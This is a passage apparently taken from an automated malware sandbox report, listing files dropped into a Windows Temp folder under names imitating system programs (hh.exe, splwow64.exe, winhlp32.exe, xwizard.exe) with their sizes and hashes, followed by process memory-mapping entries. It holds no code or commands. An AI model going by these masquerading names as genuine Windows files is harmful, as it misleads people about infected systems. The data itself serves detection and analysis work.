                                                            SHA1

                                                            80361f1e0b93143ec1ddfee156760f5938c85791

                                                            SHA256

                                                            5e3f311ae67f046b56435067bcdd39fbf836fa0421fbc8c8b0e43e8e47524954

                                                            SHA512

                                                            802ee4f8d25417589c7e62f0acc9dc2dc8f1d32654ca435f6aeae2926e6900373648790451c9143856a772a49c2a8f3c8659c5b8260f0f67559aeef875825f05

                                                          • \Users\Admin\AppData\Local\Temp\bfsvc.exe
                                                            Filesize

                                                            71KB

                                                            MD5

                                                            899d3ed011eb58459b8a4fc2b81f0924

                                                            SHA1

                                                            80361f1e0b93143ec1ddfee156760f5938c85791

                                                            SHA256

                                                            5e3f311ae67f046b56435067bcdd39fbf836fa0421fbc8c8b0e43e8e47524954

                                                            SHA512

                                                            802ee4f8d25417589c7e62f0acc9dc2dc8f1d32654ca435f6aeae2926e6900373648790451c9143856a772a49c2a8f3c8659c5b8260f0f67559aeef875825f05

                                                          • \Users\Admin\AppData\Local\Temp\hh.exe
                                                            Filesize

                                                            103KB

                                                            MD5

                                                            4d4c98eca32b14aeb074db34cd0881e4

                                                            SHA1

                                                            92f213d609bba05d41d6941652a88c44936663a4

                                                            SHA256

                                                            4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f

                                                            SHA512

                                                            959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

                                                          • \Users\Admin\AppData\Local\Temp\hh.exe
                                                            Filesize

                                                            103KB

                                                            MD5

                                                            4d4c98eca32b14aeb074db34cd0881e4

                                                            SHA1

                                                            92f213d609bba05d41d6941652a88c44936663a4

                                                            SHA256

                                                            4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f

                                                            SHA512

                                                            959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

                                                          • \Users\Admin\AppData\Local\Temp\snuvcdsm.exe
                                                            Filesize

                                                            391KB

                                                            MD5

                                                            053778713819beab3df309df472787cd

                                                            SHA1

                                                            99c7b5827df89b4fafc2b565abed97c58a3c65b8

                                                            SHA256

                                                            f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe

                                                            SHA512

                                                            35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

                                                          • \Users\Admin\AppData\Local\Temp\snuvcdsm.exe
                                                            Filesize

                                                            391KB

                                                            MD5

                                                            053778713819beab3df309df472787cd

                                                            SHA1

                                                            99c7b5827df89b4fafc2b565abed97c58a3c65b8

                                                            SHA256

                                                            f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe

                                                            SHA512

                                                            35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

                                                          • \Users\Admin\AppData\Local\Temp\splwow64.exe
                                                            Filesize

                                                            49KB

                                                            MD5

                                                            0d8360781e488e250587a17fbefa646c

                                                            SHA1

                                                            29bc9b438efd70defa8fc45a6f8ee524143f6d04

                                                            SHA256

                                                            ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64

                                                            SHA512

                                                            940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e

                                                          • \Users\Admin\AppData\Local\Temp\splwow64.exe
                                                            Filesize

                                                            49KB

                                                            MD5

                                                            0d8360781e488e250587a17fbefa646c

                                                            SHA1

                                                            29bc9b438efd70defa8fc45a6f8ee524143f6d04

                                                            SHA256

                                                            ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64

                                                            SHA512

                                                            940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e

                                                          • \Users\Admin\AppData\Local\Temp\winhlp32.exe
                                                            Filesize

                                                            184KB

                                                            MD5

                                                            a776e68f497c996788b406a3dc5089eb

                                                            SHA1

                                                            45bf5e512752389fe71f20b64aa344f6ca0cad50

                                                            SHA256

                                                            071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1

                                                            SHA512

                                                            02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073

                                                          • \Users\Admin\AppData\Local\Temp\winhlp32.exe
                                                            Filesize

                                                            184KB

                                                            MD5

                                                            a776e68f497c996788b406a3dc5089eb

                                                            SHA1

                                                            45bf5e512752389fe71f20b64aa344f6ca0cad50

                                                            SHA256

                                                            071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1

                                                            SHA512

                                                            02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073

                                                          • \Users\Admin\AppData\Local\Temp\xwizard.exe
                                                            Filesize

                                                            544KB

                                                            MD5

                                                            df991217f1cfadd9acfa56f878da5ee7

                                                            SHA1

                                                            0b03b34cfb2985a840db279778ca828e69813116

                                                            SHA256

                                                            deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112

                                                            SHA512

                                                            175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316

                                                          • \Users\Admin\AppData\Local\Temp\xwizard.exe
                                                            Filesize

                                                            544KB

                                                            MD5

                                                            df991217f1cfadd9acfa56f878da5ee7

                                                            SHA1

                                                            0b03b34cfb2985a840db279778ca828e69813116

                                                            SHA256

                                                            deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112

                                                            SHA512

                                                            175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316

                                                          • memory/284-85-0x0000000000000000-mapping.dmp
                                                          • memory/304-80-0x0000000000000000-mapping.dmp
                                                          • memory/316-90-0x0000000000000000-mapping.dmp
                                                          • memory/336-64-0x0000000000000000-mapping.dmp
                                                          • memory/460-165-0x0000000000000000-mapping.dmp
                                                          • memory/560-88-0x0000000000000000-mapping.dmp
                                                          • memory/600-121-0x0000000000000000-mapping.dmp
                                                          • memory/624-155-0x0000000000400000-0x000000000041B000-memory.dmp
                                                            Filesize

                                                            108KB

                                                          • memory/624-144-0x0000000000000000-mapping.dmp
                                                          • memory/668-106-0x0000000000000000-mapping.dmp
                                                          • memory/668-73-0x0000000000000000-mapping.dmp
                                                          • memory/672-65-0x0000000000000000-mapping.dmp
                                                          • memory/888-67-0x0000000000000000-mapping.dmp
                                                          • memory/912-92-0x0000000000000000-mapping.dmp
                                                          • memory/940-91-0x0000000000000000-mapping.dmp
                                                          • memory/984-149-0x0000000000000000-mapping.dmp
                                                          • memory/1084-72-0x0000000000000000-mapping.dmp
                                                          • memory/1088-109-0x0000000000000000-mapping.dmp
                                                          • memory/1088-77-0x0000000000000000-mapping.dmp
                                                          • memory/1160-160-0x0000000000000000-mapping.dmp
                                                          • memory/1268-71-0x0000000000000000-mapping.dmp
                                                          • memory/1308-84-0x0000000000000000-mapping.dmp
                                                          • memory/1316-69-0x0000000000000000-mapping.dmp
                                                          • memory/1352-75-0x0000000000000000-mapping.dmp
                                                          • memory/1388-68-0x0000000000000000-mapping.dmp
                                                          • memory/1492-114-0x0000000000000000-mapping.dmp
                                                          • memory/1500-79-0x0000000000000000-mapping.dmp
                                                          • memory/1508-130-0x0000000000000000-mapping.dmp
                                                          • memory/1520-89-0x0000000000000000-mapping.dmp
                                                          • memory/1552-83-0x0000000000000000-mapping.dmp
                                                          • memory/1572-151-0x0000000000400000-0x000000000045B000-memory.dmp
                                                            Filesize

                                                            364KB

                                                          • memory/1572-138-0x0000000000000000-mapping.dmp
                                                          • memory/1580-74-0x0000000000000000-mapping.dmp
                                                          • memory/1588-126-0x0000000000000000-mapping.dmp
                                                          • memory/1612-157-0x0000000000000000-mapping.dmp
                                                          • memory/1632-55-0x0000000075361000-0x0000000075363000-memory.dmp
                                                            Filesize

                                                            8KB

                                                          • memory/1632-54-0x0000000000CD0000-0x0000000001170000-memory.dmp
                                                            Filesize

                                                            4.6MB

                                                          • memory/1636-86-0x0000000000000000-mapping.dmp
                                                          • memory/1656-94-0x0000000000000000-mapping.dmp
                                                          • memory/1664-81-0x0000000000000000-mapping.dmp
                                                          • memory/1700-93-0x0000000000000000-mapping.dmp
                                                          • memory/1712-100-0x0000000002260000-0x000000000229C000-memory.dmp
                                                            Filesize

                                                            240KB

                                                          • memory/1712-99-0x00000000021E0000-0x0000000002210000-memory.dmp
                                                            Filesize

                                                            192KB

                                                          • memory/1712-101-0x0000000002210000-0x000000000221A000-memory.dmp
                                                            Filesize

                                                            40KB

                                                          • memory/1712-61-0x0000000004A80000-0x0000000004B30000-memory.dmp
                                                            Filesize

                                                            704KB

                                                          • memory/1712-105-0x0000000004E60000-0x0000000004E68000-memory.dmp
                                                            Filesize

                                                            32KB

                                                          • memory/1712-97-0x0000000000960000-0x000000000096C000-memory.dmp
                                                            Filesize

                                                            48KB

                                                          • memory/1712-98-0x0000000000970000-0x000000000098A000-memory.dmp
                                                            Filesize

                                                            104KB

                                                          • memory/1712-104-0x0000000004C10000-0x0000000004C18000-memory.dmp
                                                            Filesize

                                                            32KB

                                                          • memory/1712-102-0x0000000004B30000-0x0000000004BD2000-memory.dmp
                                                            Filesize

                                                            648KB

                                                          • memory/1712-57-0x0000000000000000-mapping.dmp
                                                          • memory/1712-170-0x0000000006420000-0x0000000006496000-memory.dmp
                                                            Filesize

                                                            472KB

                                                          • memory/1712-103-0x0000000002350000-0x0000000002358000-memory.dmp
                                                            Filesize

                                                            32KB

                                                          • memory/1712-60-0x00000000002E0000-0x000000000075A000-memory.dmp
                                                            Filesize

                                                            4.5MB

                                                          • memory/1792-82-0x0000000000000000-mapping.dmp
                                                          • memory/1856-118-0x0000000000000000-mapping.dmp
                                                          • memory/1860-87-0x0000000000000000-mapping.dmp
                                                          • memory/1920-76-0x0000000000000000-mapping.dmp
                                                          • memory/1940-62-0x0000000000000000-mapping.dmp
                                                          • memory/1960-66-0x0000000000000000-mapping.dmp
                                                          • memory/1996-78-0x0000000000000000-mapping.dmp
                                                          • memory/2008-133-0x0000000000000000-mapping.dmp
                                                          • memory/2012-70-0x0000000000000000-mapping.dmp